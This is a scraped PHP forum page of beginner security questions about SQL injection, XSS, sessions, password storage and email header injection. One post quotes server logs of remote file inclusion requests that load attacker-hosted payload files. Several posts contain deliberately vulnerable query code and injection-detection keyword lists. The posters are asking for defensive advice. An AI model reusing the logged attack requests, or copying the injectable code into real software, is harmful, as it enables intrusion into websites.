|
PHP - Small Security Question
HI all,
I have a book with some nice examples, but often i wonder if they are that secure for displaying and using outside the production area. One of them is this. A form is created by using a while loop that gets data(email addresses) from a database and shows them with check boxes. after that someone can select the e-mailaddress they don't like and delete them from the database. here is some code: <?php //.... $result = mysqli_query($dbc,$query); while ($row = mysqli_fetch_array($result)){ echo '<input type="checkbox" value"'.$row['id'].'"name="todelete[]"/>'; echo $row['firstname']; } //.........deleting part if (isset($_POST['submit'])){ foreach($_POST['todelete'] as $delete_id){ $query = "DELETE FROM email_list WHERE ID = $delete_id"; mysqli_query ($dbc, $query) or die ('error querying databse'); } } //.... ?> I have two questions: -> is this a smart way of deleting stuff? since you are going to use multiple queries instead of 1 in the for each loop. -> besides not using mysqli_real_escape_string, isn't this application allowing someone to alter the POST-array (todelete) to any value he likes? At least that's what i think can happen. If anyone knows a nice way to do this more secure , I would love to here it, because i don't really trust the html array created. Thanks in advance! Similar TutorialsI have a web site that sells products. I have just added a table (mysql) that keeps track of searches. So when a user comes to the site from a search engine the search term(s) they used to find my site are stored along with their IP as an identifier and the landing page populates with products accordingly. Also when a user uses the local search feature it updates to add the new search term(s) to the table. The page displays the search box with whatever the last search term(s) were so at a later time all someone has to do is click search to repeat it. OK, so far so good. Then I got on my iphone to test it out and when the page loaded the search terms used on my laptop were there. Duh... same IP from the network. So this is my security hole that I am trying to plug. My site doesn't set any cookies and I was trying to keep it that way, but I am thinking I may have to stray from that in order to do this. I don't suppose there is a way in php to get a users mac address is there? I was hoping that someone could offer me some tidbits of wisdom to guide me in these dark times Hi everyone! I have a question that might sound silly... I have stored in my database a url to a pic and some other data. I am unsure if when I retreive data from my database I need some sort of protection. I usually sanitize and prevent SQl injections when I code forms but I am not sure if I have to do the same when I get data from the database. Thanks for your help. Veronica Hey people, I was going over an old script of mine the other day and I ran I web vulnerability scanner on it to see how secure it was and I got an XSS warning, now this puzzles me because I am not entirely sure how this affects the script and what can/can't be done, this script is old so I will paste the relevant bits in here, it was playing with the $page variable. What damage could you do and how would you remedy the problem? Code: [Select] if(isset($_GET['page'])) { if($_GET['page'] > $numpages) { $page = 1; } else { $page = $_GET['page']; } } else { $page = 1; } echo ('<strong style="margin-top: 4px; margin-left: 3px;">Page ' . $page . ' of ' . $numpages . '</strong></p>'); By putting a non-number in there like hello.php?page=Hello, it simply output the word hello so I am not fully sure what the security implications are and how insecure it really is. Might sound like a dumb question but it's been nagging at me. Thanks for reading! Hi, My ISP doesn't allow direct access to mysql Server so I created a bridge and stored the PHP code in the main web folder (https://www.mydomain.com/post.php). The bridge works fine and is used mainly for my IOT projects. In the same web folder, is located the conn.php code containing the server's credentials. The question is, how safe is the PHP code at that location? I can create a subfolder but not sure if it matters as far as security is concerned. TIA Apologies for the lame subject title - I don't know what to call this thread. Last year, before I'd ever opened a book on php, my site was hacked. I was using a third party e-commerce script 'Cart Keeper' (since replaced). Somehow, the hackers planted some files on my server that looked like official bank pages (I'm sure you've all seen the sort of thing). Here are some log files sent by my host at that time... Quote "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:48 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:49 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:59:24 +0100] "GET /arts//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 302 313 "-" "libwww-perl/5.65" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:26 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:28 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:32 +0100] "GET /ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 42 "-" "libwww-perl/5.805" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:47 +0100] "GET /ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:48 +0100] "GET /ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:49 +0100] "GET /ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 42 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:52 +0100] "GET //ckshop.php?incdir=http://racrew.us/ec.txt?? HTTP/1.1" 200 357 "-" "libwww-perl/5.65" and here is what they wrote to me at the time... Quote The majority of these files where then caught by our egress firewall as they had completed as the file in question had allowed the http user to call a shell and use a variety of code (wget lwp et al) to call in external toolkits. This attack was mostly mechanised, however was changing so it is my belief that the perpetrator was reconfiguring the attack as he went as failures where seen. Please check your site code for possible updates, security updates, and ensure that no files have been changed that should not have been. Please confirm that you have read this mail and are aware of the implications / taking action. Can someone identify the name of this type of attack? ...and possibly a tutorial on securing against this form of attack? As I am learning php, I would like to make sure it doesn't happen again. Many thanks for your help I have a business social network site on hosting server. I am wondering if sessions are enough secure. ini_set('session.use_only_cookies', 1); //this prevent Session Fixation? session_start(); if($_SESSION['loggedIn'] && $_SESSION['userIP']==$_SERVER["REMOTE_ADDR"]) // extra security //user is logged in, assign all data to this profile from session else //user is not logged in, no data are assigned Would you consider that as enough secure? Im making a map atm which will have tokens"not sure what you call them" in the link like map.php?id=token Well I dont want a 3rd party coming along in the future and making their own map using my y and x cords. So I was thinking maybe the best way around this is to use a encryption in the link? so encrypting the x and y cords in the link. Anyone have any ideas on this. Also I was wondering is it impossible for php to know when somone clicks a link? I was googling around and it doesnt seem like you cant simply use a $_POST for a link I have a search button to help user searching text they are looking. and i use $_GET to pass the value and get it into my query so it simply like this when value was passed into the URL page.php?search=text the problem is that when i try to modify a bit like this page.php?search=">test although i don't get any problem with the query (ERROR) as i've replaced all special characters with blank string, but i always have this test" /> text appear on my page.. what should i do to avoid this?? if they can do whatever they want, it means there is a space for attacker to inject bad codes thanks in advance let say i have this <a href="myuploadfolder/picture1.jpg">Picture</a> and when user click on the link, they can see in which folder their picture were kept...is this dangerous?? if yes then how to hide it?? thanks in advance Hi all, I have heard stories that hackers/viruses or basically something that you don't want uploaded to a server through a website form have been able to type some sort of code in to a html form field to access information. I know how to control the length of fields, how to validate that an email address is in the correct format etc. - but when it comes to having a textfield for the user to add up to 2000 characters of their own words, how can I protect from malicious code being inserted? The textfield is located inside the user area but anyone can join, so anyone ultimately can enter code! Thanks for the help. I have a php page that processes a form. How do I prevent someone from making their own form on their own domain and then saying <form metod=post action = "www.hackerdomain.com/bad.php"> and then passing their own variables? Do I set up a $session variable on my form page and assign it to $_SERVER["PHP_SELF"]? Hi all, I thought instead of just simple do all the security stuff automatically, why not see for myself what the it can do. So I made a simple table besides the other tables named delete_me, made a form and started testing. But for some reason I can get that table to drop. this is what i did on the front end with help from he http://en.wikipedia.org/wiki/SQL_injection in all 3 fields (firstname, lastname email) put a value and in the last one i put: but nothing happend. if someone knows what i am doing wrong please tell me because I think it's vital in order to protect yourself one needs to know what he or she is up against. Hi all a small question. I was wondering if someone knows what would be the approach to achieve the following. on a page I show a random number. If the page refreshes (selfreferencing) It shows a new random number but also a the previous number, and this must be able to repeat itself : ) So to make it more visible: New Random number = 98765 Previous Number = 56412 This is what I have but it's ofc not working because ones the session var has been set it will not show the previous variable but the very first one. <?php session_start(); $random_number .= mt_rand(1,100000); if(!isset($_SESSION['number'])){ $_SESSION['number']=$random_number; } // echo all out: echo 'New random number is: '.$random_number; echo 'Previous number is: '.$_SESSION['number']; ?> I bet i need another variable to store the previous one in but for some reasons my brains don't work at the moment Hey guys. Sorry to start asking questions being such a new member but this just suddenly came up. I have a php script that needs to send binary data to another php script via HTTP. The data can be transferred through the methods GET and POST, preferably POST and preferably not as a file. The problem is that I have tried a number of ways to do this but every time the data seems to be corrupted. Some bytes stay the same but others disappear or change. I guess that they transfer through ASCII mode instead of BINARY but couldn't find any way to fix this. Any help would be deeply appreciated. Cheers. Hi all, I just stumbled upon the 'new' filter function of php and i was wondering if someone could maybe recommend me which to use. for instance if i have a script: <?php $_evilstring = "<script> alert('justin bieber is ruining your sound system')</script>"; $_clean1 = htmlspecialchars($_evilstring); echo 'clean string one = '.$_clean1.'<br />'; $_clean2 = filter_var($_evilstring, FILTER_SANITIZE_SPECIAL_CHARS); echo 'clean string two = '.$_clean2.'<br />'; ?> Both output exactly the same. Now i was wondering if there might be differences in them. For some reason I would like to use the filter function because the name sounds better, but that of course is not very scientific. Anyone with ideas maybe performance, speed, wickedness?? Hi Guys I have built a simple form, which has text fields Name, Telephone Number, Best Time to Call and E-mail. For security purposes, I am testing each against the function shown below which looks for dangerous code snippets, in an effort to protect against email header injection attacks. When it comes to the E-mail field, I am not actually testing whether a valid e-mail address has been entered, as it is the telephone number which is essential, not the e-mail. My question is, do you think this is a security weakness? Many thanks Code: [Select] //http://www.tonyspencer.com/2005/12/15/email-injection-exploit-through-a-php-contact-form/ //preg_match string to match goes within forward slashes, i.e. /str/, and i at the end makes it case insensitive function containsInjectionAttempt($input) { if (preg_match("/\r/i", $input) || preg_match("/\n/i", $input) || preg_match("/%0a/i", $input) || preg_match("/%0d/i", $input) || preg_match("/Content-Type:/i", $input) || preg_match("/<script>/i", $input) || preg_match("/bcc:/i", $input) || preg_match("/to:/i", $input) || preg_match("/cc:/i", $input)) { return true; } else { return false; } } I am trying to keep the user input clean with this script but can't figure out what is wrong with it. the error I am getting is Warning: preg_match() expects parameter 1 to be string, $bad_strings = array( "content-type:", "mime-version:", "multipart/mixed", "Content-Transfer-Encoding:", "bcc:", "cc:", "to:", ); if (preg_match($bad_strings, $first_name)) { die; I have a login system that uses a flat file database. The flat file is in a directory outside the public_html. My questions; 1- Is is still possible to hack into that file? Currently I do not encrypt the passwords as I have been told that having the file outside the public_html makes the file unavailable to the public. This allows me the advantage of sending the Username and Password to the user in an email if they forget there password or username. Otherwise- I would have to set up a more complicated method to allow them to change their password to re-gain access to the site. I have an SSL on the site also so I am not worried about packet sniffing. Thanks Hello, all: I'm a newbie and I'm trying to understand the whole php security thing a bit better, and found this function that seems easy to implement, as well as easy to understand... my question is... Does this means I could use regular $_POST, $_GET, $_COOKIE, $_REQUEST variables without having to individually worry about escaping them every time I use them in queries... is this correct? or safe enough? see example below, along with how I'm using variable in a query... it seems to be working fine, as it does echo out the \ escape character when I test it, or when I try to inject it... Appreciate your input! Code: [Select] <?php $_POST=sanitize($_POST); $_GET=sanitize($_GET); $_COOKIE=sanitize($_COOKIE); $_REQUEST=sanitize($_REQUEST); function sanitize($input){ if(is_array($input)){ foreach($input as $k=>$i){ $output[$k]=sanitize($i); } } else{ if(get_magic_quotes_gpc()){ $input=stripslashes($input); } $output=mysql_real_escape_string($input); } return $output; } // mysql query then I could use be: $money = $_GET['money']; $result = mysql_query("SELECT * FROM countries WHERE currencies = '$money'"); ?> |
|||||||